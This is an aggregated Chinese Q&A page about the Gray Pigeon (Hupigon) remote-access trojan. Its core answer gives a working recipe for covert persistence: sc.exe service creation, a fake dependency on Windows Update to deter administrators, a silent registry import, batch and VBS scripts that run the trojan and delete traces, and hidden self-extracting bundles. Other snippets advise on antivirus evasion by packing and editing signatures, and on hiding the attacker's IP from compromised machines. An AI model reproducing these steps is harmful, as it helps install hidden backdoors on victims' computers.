怎样使灰鸽子生成的木马做到免杀通过杀毒软件?有没有包教会我师傅级的,为了大学论文取材,愿付100元

作者&投稿:温学 (若有异议请与网页底部的电邮联系)
如何让灰鸽子木马永久免杀?~

这个不可能的,因为你再怎么加壳,再怎么加花,只要杀毒软件公司一截获,然后他们一分析,特征码一加如病毒库,然后用户的病毒库一更新,又可以查杀了。

这个方法在官方出专杀不久,我自己是根据Radmin配置得到的灵感,没什么技术含量,一直不敢说出来怕大家笑话,老鸟就不用看了 废话少说现在讲下正题: 我们的目标是: 过官方专杀,过咔吧主动防御 的不死神鸽 准备工具: 鸽子服务端 IcoSprite图标更改器; SC.exe服务添加删除更改工具; winrar 程序特点: 自解压形式,双击即可 制作过程: 1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。 2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi" ‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。 sc.exe descript_ion huigezi "不死鸽子" ‘这句是将huigezi服务的描述改为“不死鸽子” sc config wuauserv depend= huigezi ‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。 这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。 3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg 4.创建一个BAT文件,并命名为update.bat @regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\Update.vbs @del /q /f /s %systemroot%\system32\Update.bat 5.创建一个vbs并命名为update.vbs 目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。 里面写上如下代码: On Error Resume Next set wshshell=createobject ("wscript_.shell") a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE) 6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。 记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海.... 7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs 当然解压模式依旧全部隐藏,替换同名文件 现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机 这个方法可以用到其他的木马中 捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开" 补充: 楼上的不靠谱,人家看都不会看,不管用怎样的手段

很高兴为您解答:
你所说的是不可能实现的行为
当然你使用360是可以的
但是遇到腾讯电脑管家就不行了
没有任何病毒或是木马能逃的过腾讯电脑管家的法眼
建议使用腾讯电脑管家
1,使用电脑管家定期清理自己的垃圾,以保持自己的计算机常用常新;
2,使用电脑管家进行有效的拦截、清杀病毒。
3, 定期进行全盘扫描,让病毒无所遁形,如有难以清除的病毒请尝试在“安全模式”进行。
4,保持良好的上网习惯,不要随意点开陌生人或者来历不明的网址或者链接,对于陌生人发送的任何文件不要随意打开。
阿狸祝楼主祝您工作、生活愉快!!

灰鸽子是用来远程的,杀软根据特征码杀毒,免杀可以通过加花加壳,也要看的免杀学的好不好,如果免杀没做好,杀软病毒库一更新,就能查出病毒。

加壳 加花

反正我是不信你是为了论文取材。写这种论文的肯定会,不会的绝对不是拿来干好事的。


懂灰鸽子的进来下
首先,有反灰鸽子软件,反过来可以查到你的IP,建议你先找代理改自己IP!!找肉鸡?最好给图片添加你的文件,然后让别人解压缩时自动运行~什么人都可以,只要去你网络空间下载你的文件..

...本机IP地址都不一样!还能垃圾我灰鸽子上的朋友吗电脑
用动态IP啊,花生壳或者是VPN或者是3322域名代理。用上代理之后,不管你的IP怎么变都能让肉鸡找到你,因为灰鸽子是反向连接。

如何彻底清除灰鸽子?
先下载个灰鸽子专杀!!!再个就是有人入侵到你的电脑里把鸽子种到你机子里了鸽子生成的程序就是1点自动运行我估计是你那个没删你有时后自己点上运行了或者.是别人入侵到你电脑里运行了这个鸽子木马比较难杀现在好多生成的木马都经过加工免杀了(就是杀毒工具查不出来)我特此推荐把你的电脑安全管理加强1些把不用的...

灰鸽子属远程木马吧,那远程木马还有那些?
在我潜意识中说起“木马”马上就联想到三国时期诸葛亮先生发明的木牛流马,当初怎么就想不通它与病毒扯上关系了。经过一番了解,原来它是借用了一个古希腊士兵藏在木马中潜入敌方城市,从而一举占领敌方城市的故事,因为现在所讲的木马病毒侵入远程主机的方式在战略上与其攻城的方式一致。通个这样的解释相信大多数朋友...

灰鸽子是绑定电脑的还是绑定区域名的???
木马是绑定域名的,只会主动连接这个设置时的ip。

病毒cdn怎么杀?
G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。 Windows目录下...

系统服务中竟然有灰鸽子
9.以上只是一些查杀未知病毒木马的思路,前提是一定要具体事物具体分析.因为灰鸽子是依靠加载系统服务来进行底层运行的,因此经常有把病毒查杀后仍然在服务中残留有项目的情况出现,这并不代表着还有木马存在.所以需要具体来分析的.PS:我就曾经帮两个朋友查杀过灰鸽子了.其中一个还是用QQ的远程协助来弄的呢 ...

白鸽子配灰鸽子的好处
如下:1、白鸽子和灰鸽子杂交可以产生不同颜色的后代,增加遗传多样性,使后代具有更多的优良性状。2、通过杂交,可以将不同品种的优点结合在一起,培育出更优秀的品种。3、通过杂交,可以引入不同品种的免疫基因和耐力基因,增加后代的抗病性和耐力。4、通过杂交,可以增加种群数量,促进种群的发展。

怎么玩木鸽子?
灰鸽子远程控制 这个是黑客入侵用的呵呵 还有的就是对方开个远程协助 点我的电脑属性 远程 沟选允许拥护远程连接到此电脑 然后点开始--运行--CMD---IPCONFIG 回车 这样就得到了自己的IP 把IP告诉要控制的电脑 控制的电脑用远程桌面连接连接他的电脑就可以了 方法是:开始-程序-附件-通讯--远程桌面...

Backdoor.Win32.Hupigon.cvx.26808是什么病毒
这是一个名为灰鸽子的木马 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。

道县18839554343: 灰鸽子木马怎么做免杀? -
袁连炉甘: C32 OD LordPE 偏移转换工具OC还有 加壳工具 加壳工具用北斗4.1就可以了 我就用 这个 还要MYCLLMYCLL 是 定位用的最好先学会 汇编 学汇编看看8088 就可以了

道县18839554343: 灰鸽子木马怎样做免杀 -
袁连炉甘: 所有远控木马免杀都差不多,你要生成以后免杀也行,一生成就免杀也行,最好的后面那种.要一生成就免杀,只要免杀鸽子目录里Cache目录下的CServer.dat文件就行,至于具体免杀方法不是一句两句说的明白的.准备好几个工具:MYCCL,OD,还有你要过的杀毒软件,用MYCCL和杀软定位特征码,OD修改特征码,能过杀软并能正常使用就可以了

道县18839554343: 灰鸽子手工免杀怎么做啊? -
袁连炉甘: 首先是生成灰鸽子木马,然后用加壳工具对生成的木马加壳,加壳工具你可以自己搜下,网上很多,然后在自己本地用杀毒软件查杀,杀不出来就表明免杀了,其他加壳就是隐藏病毒特征码.

道县18839554343: 请问我有黑防灰鸽子的密码和木马.怎么把它免杀. -
袁连炉甘: 简单说 就是特征码修改,捆绑工具,都可以做免杀 用 myccl.exe 特征码定位在修改特征码 就能达到免杀想学找我 1040364854

道县18839554343: 我用灰鸽子配置的木马一放进对方的电脑就被杀了,我是内网用户.请问如何免杀?
袁连炉甘: 首先要将病毒 加壳 网上有这类软件 下载 为了方便 就上网找一款免杀 的病毒 在虚拟机中测试 确定免杀后破解该病毒 找到免杀的程序 载入 自己的 FINISH

道县18839554343: 生成的木马怎样做免杀?
袁连炉甘: 木马好生成,免杀难做啊.下载的木马如果,鸽子,上兴,byshel,pcshell,有很多都没有加壳,因为加了也没有用,没有加壳更方便用户手动加壳,如果加壳,需要peid 或FI查壳,然后用OD,手动脱壳,如果脱完的壳不能运行还要进行修复....

道县18839554343: 灰鸽子怎么做免杀?
袁连炉甘: 可以用工具免杀,也可以手工免杀,工具一般是加花指令,但是现在的杀软都能脱壳和主动防御,很难过,而手工免杀,就是将特征码部分给模糊处理掉,加上一些跳转指令之类的,但是现在灰鸽子已经过时了,建议使用pcshare或者木偶之类的.

道县18839554343: 给灰鸽子做免杀用什么工具? -
袁连炉甘: 当然是生成的服务端啊, 1>.入口点加1免杀法. 1.用到工具:PEditor2.特点:非常简单实用,但有时还会被卡巴查杀.3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可 2>.变化入口地址免杀法 1.用到工具:OllyDbg,PEditor2.特点:...

道县18839554343: 灰鸽子怎么样才能免杀?
袁连炉甘: 修改木马的特征码,或者多加几个复杂的壳 一般都能过杀软了

道县18839554343: 求教高手:灰鸽子怎么做出来是免杀的?
袁连炉甘: 还是别用灰鸽子了 那东西被杀毒软件盯的紧 光特征码就要修改好几处... 尽量用一些比较不常见的远控,或者用gh0st这样的开源远控 自己修改代码 如果非要用灰鸽子的话 就试试 加壳、加花、修改特征码、改入口点、改壳等综合起来用...虽然很麻烦.

本站内容来自于网友发表,不代表本站立场,仅表示其个人看法,不对其真实性、正确性、有效性作任何的担保
相关事宜请发邮件给我们
© 星空见康网